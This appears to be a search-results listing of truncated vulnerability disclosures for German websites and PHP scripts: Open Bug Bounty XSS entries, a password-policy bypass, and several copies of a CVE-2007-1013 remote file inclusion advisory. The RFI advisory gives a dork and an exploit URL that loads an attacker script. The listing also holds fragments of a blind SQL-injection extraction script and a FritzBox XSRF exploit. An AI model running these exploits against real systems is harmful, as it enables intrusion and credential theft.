strong Password Policy Bypass through removing a specific Parameter and setting the Passwort to 1

Hello, i was able to detect another password security issue. While changing the password the attacker can use the proxy and submit for example password as 1. Altough there is a passwort policy restriction but i managed to bypass that. Let me show you : The Password is now 2 lets change it to HACK...

passwort-zentrale.de XSS vulnerability

Open Bug Bounty ID: OBB-686796 Description| Value ---|--- Affected Website:| passwort-zentrale.de Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

messe.feinkost-kaefer.de XSS vulnerability

Open Bug Bounty ID: OBB-672459 Description| Value ---|--- Affected Website:| messe.feinkost-kaefer.de Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

radio-wattwurm.de XSS vulnerability

Open Bug Bounty ID: OBB-596427 Description| Value ---|--- Affected Website:| radio-wattwurm.de Open Bug Bounty Program:| Create your bounty program now. It's open and free. Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1...

bvg.de XSS vulnerability

Vulnerable URL: https://www.bvg.de/de/Meine-BVG/Kontoeinstellungen/Passwort-vergessen Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 15838 VIP website status:| Yes Coordinated Disclosure Timeline: Description|...

selgros.de XSS vulnerability

Vulnerable URL: https://www.selgros.de/passwort-vergessenform-anchor Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 219086 VIP website status:| No Check selgros.de SSL connection:|...

harzflirt.de XSS vulnerability

Vulnerable URL: http://harzflirt.de/index.php?seite=passwort Details: Description| Value ---|--- Patched:| Yes, at Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 272036 VIP website status:| No Check harzflirt.de SSL connection:| Grade: F Coordinated Disclosure...

PHPscripte24 Preisschlacht Liveshop System - 'index.php?aid' SQL Injection

----------------------------Information------------------------------------------------ +Name : phpscripte24 Preisschlacht Liveshop System SQL Injection seite&aid index.php +Autor : Easy Laster +Date : 19.03.2010 +Script : phpscripte24 Preisschlacht Liveshop System +Language :PHP +Discovered by...

FtitzBox

Exploitation: Remote with browser Exploit: Available Impact: Medium Fix: N/A - Description: Via XSRF change settings in FritzBox. - Vulnerability: XSRF vulnerability, when you use the FritzBox without passwort login - example Exploit for Portforwarding: html body...

mumbojumbo-sql.txt

php '.$argv0.' http://www.site.com/cms/ 300 1 '; if $argc 1 printr' '; echo 'Searching for Admin: '; for$i=1; $i = 50; $i++ $temp1 = filegetcontents$argv1.'index.php?id='.$argv2.'+and+lengthselect+kennung+from+op4admin+where+id='.$argv3.'='.$i.'--'; if strpos$temp1,'Die angeforderte Seite existie...

CVE-2007-1013

PHP remote file inclusion vulnerability in generate.php in VirtualSystem Htaccess Passwort Generator 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the htpfad parameter...

Remote file inclusion

PHP remote file inclusion vulnerability in generate.php in VirtualSystem Htaccess Passwort Generator 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the htpfad parameter...

CVE-2007-1013

PHP remote file inclusion vulnerability in generate.php in VirtualSystem Htaccess Passwort Generator 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the htpfad parameter...

CVE-2007-1013

CVE-2007-1013 is a PHP remote file inclusion vulnerability affecting the VirtualSystem Htaccess Passwort Generator 1.1. The flaw resides in generate.php where an attacker can supply a URL in the ht_pfad parameter to cause arbitrary PHP code execution on the affected system. The vulnerability desc...

Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability

HtaccessgenV1.1.1C Htaccess Passwort Generator V.1.1 Discovered By:- kezzap66345 Download:http://www.virtualsystem.de/downloads/index.php?mekat=PHPScripte&seite=2 dork:htgen.php code: include $htpfad."/tpl/ok.html"; exploit http://target/path/generate.php?htpfad=3vil script? I am a Turk...

Htaccess Passwort Generator 1.1 (ht_pfad) RFI Vulnerability

Exploit for unknown platform in category web applications =========================================================== Htaccess Passwort Generator 1.1 htpfad RFI Vulnerability =========================================================== HtaccessgenV1.1.1C Htaccess Passwort Generator V.1.1 Discovere...

Htaccess Passwort Generator 1.1 - ht_pfad Remote File Inclusion

Htaccess Passwort Generator 1.1 - htpfad Remote File Inclusion HtaccessgenV1.1.1C Htaccess Passwort Generator V.1.1 Discovered By:- kezzap66345 Download:http://www.virtualsystem.de/downloads/index.php?mekat=PHPScripte&seite=2 dork:htgen.php code: include $htpfad."/tpl/ok.html"; exploit...

Htaccess Passwort Generator 1.1 - 'ht_pfad' Remote File Inclusion

HtaccessgenV1.1.1C Htaccess Passwort Generator V.1.1 Discovered By:- kezzap66345 Download:http://www.virtualsystem.de/downloads/index.php?mekat=PHPScripte&seite=2 dork:htgen.php code: include $htpfad."/tpl/ok.html"; exploit http://target/path/generate.php?htpfad=3vil script? I am a Turk...